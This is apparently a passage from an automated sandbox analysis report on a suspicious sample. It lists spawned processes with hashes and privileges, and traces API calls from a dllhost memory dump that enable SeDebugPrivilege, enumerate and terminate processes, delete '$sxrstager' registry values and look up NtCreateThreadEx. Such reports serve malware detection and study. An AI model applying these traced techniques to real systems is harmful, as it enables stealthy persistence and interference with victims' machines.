                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:26
                                                                                                          Start time:16:35:25
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dwm.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:dwm.exe
                                                                                                          Imagebase:0x7ff68eb30000
                                                                                                          File size:94'720 bytes
                                                                                                          MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:27
                                                                                                          Start time:16:35:26
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{92e841ec-e3f1-4b8b-895f-b885255cbce1}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:28
                                                                                                          Start time:16:35:26
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus
                                                                                                          Imagebase:0xd50000
                                                                                                          File size:144'896 bytes
                                                                                                          MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:29
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:30
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{25768c7a-7ac5-4718-a464-d7bd931650f7}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:31
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{2e416721-4f03-488b-85bf-d48d4305e55d}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:32
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{6cf183fd-4345-4e83-86c3-b67edbc5a93f}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:33
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:34
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{b21552e6-10c0-4b77-8348-e34fa993b74e}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:35
                                                                                                          Start time:16:35:28
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:36
                                                                                                          Start time:16:35:28
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:37
                                                                                                          Start time:16:35:28
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          Imagebase:0xdc0000
                                                                                                          File size:418'304 bytes
                                                                                                          MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:38
                                                                                                          Start time:16:35:28
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:39
                                                                                                          Start time:16:35:29
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{408c66d6-6f69-434f-838a-86e87b4371ae}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:40
                                                                                                          Start time:16:35:29
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{205dcea9-d057-463c-a3cf-998f0b1939dc}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:41
                                                                                                          Start time:16:35:29
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{a65f9779-a778-403b-96e3-bdb0de023251}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:42
                                                                                                          Start time:16:35:29
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe"
                                                                                                          Imagebase:0x830000
                                                                                                          File size:140'800 bytes
                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false


                                                                                                            Execution Graph

                                                                                                            Execution Coverage:38.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:74.4%
                                                                                                            Total number of Nodes:43
                                                                                                            Total number of Limit Nodes:2

                                                                                                            Callgraph

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2310170418.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$Heap$AllocFreeOpenString$CloseHandleInitializeTokenValue$AdjustCreateCurrentDeleteErrorInitInstanceLastLookupPrivilegePrivilegesSecurityTerminateUninitializeVariant
                                                                                                            • String ID: $sxrstager$$sxrsvc64$SOFTWARE$SeDebugPrivilege
                                                                                                            • API String ID: 2227612056-566595606
                                                                                                            • Opcode ID: 33545f7b093bffa7e6d6e68f596167ee68986d03797a0cce563c85867658168a
                                                                                                            • Instruction ID: 783fc730cd4673971968b08ac741f1a1a7a0f0db785b3f54083c1a857c08c9a6
                                                                                                            • Opcode Fuzzy Hash: 33545f7b093bffa7e6d6e68f596167ee68986d03797a0cce563c85867658168a
                                                                                                            • Instruction Fuzzy Hash: 60A117B2700B4586EB16CF66F8543E923A5FB8DB89F448125EF0E47AA5DF38D549C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2310170418.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 4084875642-0
                                                                                                            • Opcode ID: 5c9e6c8d196d291886fbe90ea79c47c3ea45cb56a21c54cb6fbac88e5fb9df12
                                                                                                            • Instruction ID: 0c4118f11d38248736db898342297cfd33e1e7ee26b5e3befa791c7e9a42177d
                                                                                                            • Opcode Fuzzy Hash: 5c9e6c8d196d291886fbe90ea79c47c3ea45cb56a21c54cb6fbac88e5fb9df12
                                                                                                            • Instruction Fuzzy Hash: 58514AB2611B818AEB66DF63B8587DA22A1F78DBC4F444025EF4A5B764DF38C545C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 57 140000231-140001011 ExitProcess
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2310170418.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 621844428-0
                                                                                                            • Opcode ID: 7ac854e1e7e6dbe7a1b520466d2429235592816ec396c733cc4186b22ad55d33
                                                                                                            • Instruction ID: 71e4820d4104f39f37cf17a5aebe01a9dbe568c608f41c0cf1242f6b27dbe954
                                                                                                            • Opcode Fuzzy Hash: 7ac854e1e7e6dbe7a1b520466d2429235592816ec396c733cc4186b22ad55d33
                                                                                                            • Instruction Fuzzy Hash: 84E0426350E3C10FC7038B74586419C3FB09796A50B8EC59BC385C3383C61C5409C312
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 58 140001000-140001011 call 140001014 ExitProcess
                                                                                                            APIs
                                                                                                              • Part of subcall function 0000000140001014: GetCurrentProcessId.KERNEL32 ref: 0000000140001027
                                                                                                              • Part of subcall function 0000000140001014: OpenProcess.KERNEL32 ref: 0000000140001037
                                                                                                              • Part of subcall function 0000000140001014: OpenProcessToken.ADVAPI32 ref: 0000000140001051
                                                                                                              • Part of subcall function 0000000140001014: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140001068
                                                                                                              • Part of subcall function 0000000140001014: AdjustTokenPrivileges.ADVAPI32 ref: 00000001400010A4
                                                                                                              • Part of subcall function 0000000140001014: GetLastError.KERNEL32 ref: 00000001400010AE
                                                                                                              • Part of subcall function 0000000140001014: CloseHandle.KERNEL32 ref: 00000001400010B7
                                                                                                              • Part of subcall function 0000000140001014: RegOpenKeyExW.ADVAPI32 ref: 00000001400010DD
                                                                                                              • Part of subcall function 0000000140001014: RegDeleteValueW.ADVAPI32 ref: 00000001400010F2
                                                                                                              • Part of subcall function 0000000140001014: SysAllocString.OLEAUT32 ref: 00000001400010FF
                                                                                                              • Part of subcall function 0000000140001014: SysAllocString.OLEAUT32 ref: 000000014000110F
                                                                                                              • Part of subcall function 0000000140001014: CoInitializeEx.OLE32 ref: 000000014000111C
                                                                                                              • Part of subcall function 0000000140001014: CoInitializeSecurity.OLE32 ref: 0000000140001156
                                                                                                              • Part of subcall function 0000000140001014: CoCreateInstance.OLE32 ref: 0000000140001195
                                                                                                              • Part of subcall function 0000000140001014: VariantInit.OLEAUT32 ref: 00000001400011A7
                                                                                                            • ExitProcess.KERNEL32 ref: 000000014000100B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2310170418.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$Open$AllocInitializeStringTokenValue$AdjustCloseCreateCurrentDeleteErrorExitHandleInitInstanceLastLookupPrivilegePrivilegesSecurityVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 767316500-0
                                                                                                            • Opcode ID: 744f39d44c6e1cf923b69681ca2190275410b93513addb8cd57da560c05945df
                                                                                                            • Instruction ID: 146724fef438b737ed00828a951e49ec2c44f6708d9892ddea2fdd56566e6da4
                                                                                                            • Opcode Fuzzy Hash: 744f39d44c6e1cf923b69681ca2190275410b93513addb8cd57da560c05945df
                                                                                                            • Instruction Fuzzy Hash: 65A011B0A00280A2EA0AFBB2388A3C800200B88380F000808A30A832B3CE3C00C88220
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 61 140001648-140001661 GetModuleHandleA 62 140001663-14000166a GetProcAddress 61->62 63 140001670-140001674 61->63 62->63
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2310170418.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: NtCreateThreadEx$ntdll.dll
                                                                                                            • API String ID: 1646373207-690569937
                                                                                                            • Opcode ID: 765a30b2bbc0babb255d7f809e438350524f6181367cf5a0d3374a3ce406139f
                                                                                                            • Instruction ID: 1f1ac530e8d7bc586301703381b49fd6cf30065bcfbc8e8d092ce1a2171d6dbf
                                                                                                            • Opcode Fuzzy Hash: 765a30b2bbc0babb255d7f809e438350524f6181367cf5a0d3374a3ce406139f
                                                                                                            • Instruction Fuzzy Hash: 5CD0E9F4612A41D1EA0BEF57FC593D512616B9C7C5F854461A70A43271DE3C859AC710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:64.2%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:56
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph 107 4014fc 110 401509 107->110 127 40133e GetCurrentProcessId OpenProcess 110->127 113 401540 134 4013d1 SysAllocString SysAllocString CoInitializeEx 113->134 114 401532 RegDeleteValueW 114->113 116 401546 143 401292 GetProcessHeap HeapAlloc 116->143 118 40154b GetProcessHeap HeapAlloc 150 401081 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 118->150 120 40159d GetProcessHeap RtlFreeHeap 157 401000 RegOpenKeyExW 120->157 122 401501 ExitProcess 123 401572 123->120 124 40158c 123->124 126 40159b 123->126 163 40122b 124->163 126->120 128 401361 OpenProcessToken 127->128 129 4013cb RegOpenKeyExW 127->129 130 401372 LookupPrivilegeValueW 128->130 131 4013c4 FindCloseChangeNotification 128->131 129->113 129->114 130->131 132 401386 AdjustTokenPrivileges 130->132 131->129 132->131 133 4013b6 GetLastError 132->133 133->131 135 4014e6 134->135 136 401408 CoInitializeSecurity 134->136 139 4014e9 SysFreeString SysFreeString 135->139 137 401429 CoCreateInstance 136->137 138 40141e 136->138 140 40144d VariantInit 137->140 142 401490 CoUninitialize 137->142 138->137 138->142 139->116 140->142 142->139 144 401081 12 API calls 143->144 147 4012be 144->147 145 40130c GetProcessHeap RtlFreeHeap 145->118 146 40130a 146->145 147->145 147->146 148 4012dd OpenProcess 147->148 148->147 149 4012f0 TerminateProcess CloseHandle 148->149 149->147 151 4011fd GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 150->151 156 4010e9 150->156 151->123 152 4011fb 152->151 153 401100 OpenProcess 154 40111a K32EnumProcessModules 153->154 153->156 155 4011ea FindCloseChangeNotification 154->155 154->156 155->156 156->152 156->153 156->155 158 40106b RegDeleteKeyExW 157->158 159 40102c 157->159 158->122 160 40103e RegEnumKeyExW 159->160 161 401062 RegCloseKey 160->161 162 40102e RegDeleteKeyW 160->162 161->158 162->160 164 401240 OpenProcess 163->164 165 40128b 163->165 164->165 166 401255 164->166 165->123 171 40131f GetModuleHandleA 166->171 168 401271 169 401288 CloseHandle 168->169 170 401282 CloseHandle 168->170 169->165 170->169 172 40133b 171->172 173 40132e GetProcAddress 171->173 172->168 173->168

                                                                                                            Callgraph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            • Opacity -> Relevance
                                                                                                            • Disassembly available
                                                                                                            callgraph 0 Function_00401000 1 Function_004013D1 2 Function_00401081 3 Function_00401292 3->2 4 Function_00401509 4->0 4->1 4->2 4->3 5 Function_0040122B 4->5 7 Function_0040133E 4->7 8 Function_0040131F 5->8 6 Function_004014FC 6->4

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00401348
                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
                                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
                                                                                                            • GetLastError.KERNEL32 ref: 004013B6
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004013C5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$OpenToken$AdjustChangeCloseCurrentErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                            • String ID: SeDebugPrivilege
                                                                                                            • API String ID: 575374161-2896544425
                                                                                                            • Opcode ID: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
                                                                                                            • Instruction ID: e2a5f4244efd0fdb54eb2fb8bae3e68f4838b917bcc28da7506a6e19d6301c26
                                                                                                            • Opcode Fuzzy Hash: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
                                                                                                            • Instruction Fuzzy Hash: C101CC75901619AFE7009BA49E89BAF77BCEB04745F004435BA01F22D1D7B49E44CB68
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
                                                                                                            • K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
                                                                                                            • K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
                                                                                                            • ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 004011EB
                                                                                                            • GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 0040120C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00401212
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 00401219
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocEnumFree$ChangeCloseFindMemoryModulesNotificationOpenProcessesRead
                                                                                                            • String ID: pD$v
                                                                                                            • API String ID: 2178662837-1969647411
                                                                                                            • Opcode ID: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
                                                                                                            • Instruction ID: da445f777c3a34a6d199b0584eba223951ce35d7d1b72319c39e632b78911c99
                                                                                                            • Opcode Fuzzy Hash: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
                                                                                                            • Instruction Fuzzy Hash: 8A513075D00219ABDB14DFD5CE84AAFBBB8FF0D300F10446AE645BB290D7789A41CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32($sxrsvc32), ref: 004013E7
                                                                                                            • SysAllocString.OLEAUT32(00402114), ref: 004013F1
                                                                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 004013FA
                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401414
                                                                                                            • CoCreateInstance.OLE32(00402098,00000000,00000001,00402088,?), ref: 0040143F
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00401451
                                                                                                            • CoUninitialize.OLE32 ref: 004014DE
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 004014F0
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004014F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                            • String ID: $sxrsvc32
                                                                                                            • API String ID: 4184240511-78464866
                                                                                                            • Opcode ID: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
                                                                                                            • Instruction ID: 8a654483f6148525abe5e909ff2a9399e1f522979beb927b6318c92976265d17
                                                                                                            • Opcode Fuzzy Hash: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
                                                                                                            • Instruction Fuzzy Hash: 55415271E00218AFDB00DFA9CD899AF7BBDEF45354B100069F905FB1A0C6B5AD05CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0040133E: GetCurrentProcessId.KERNEL32 ref: 00401348
                                                                                                              • Part of subcall function 0040133E: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
                                                                                                              • Part of subcall function 0040133E: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
                                                                                                              • Part of subcall function 0040133E: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
                                                                                                              • Part of subcall function 0040133E: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
                                                                                                              • Part of subcall function 0040133E: GetLastError.KERNEL32 ref: 004013B6
                                                                                                              • Part of subcall function 0040133E: FindCloseChangeNotification.KERNELBASE(00000000), ref: 004013C5
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F023F,?,?,?,?,00401501), ref: 00401528
                                                                                                            • RegDeleteValueW.KERNELBASE(?,$sxrstager,?,?,?,00401501), ref: 0040153A
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,?,00401501), ref: 00401552
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00401501), ref: 00401559
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401501), ref: 004015A0
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,?,?,00401501), ref: 004015A7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
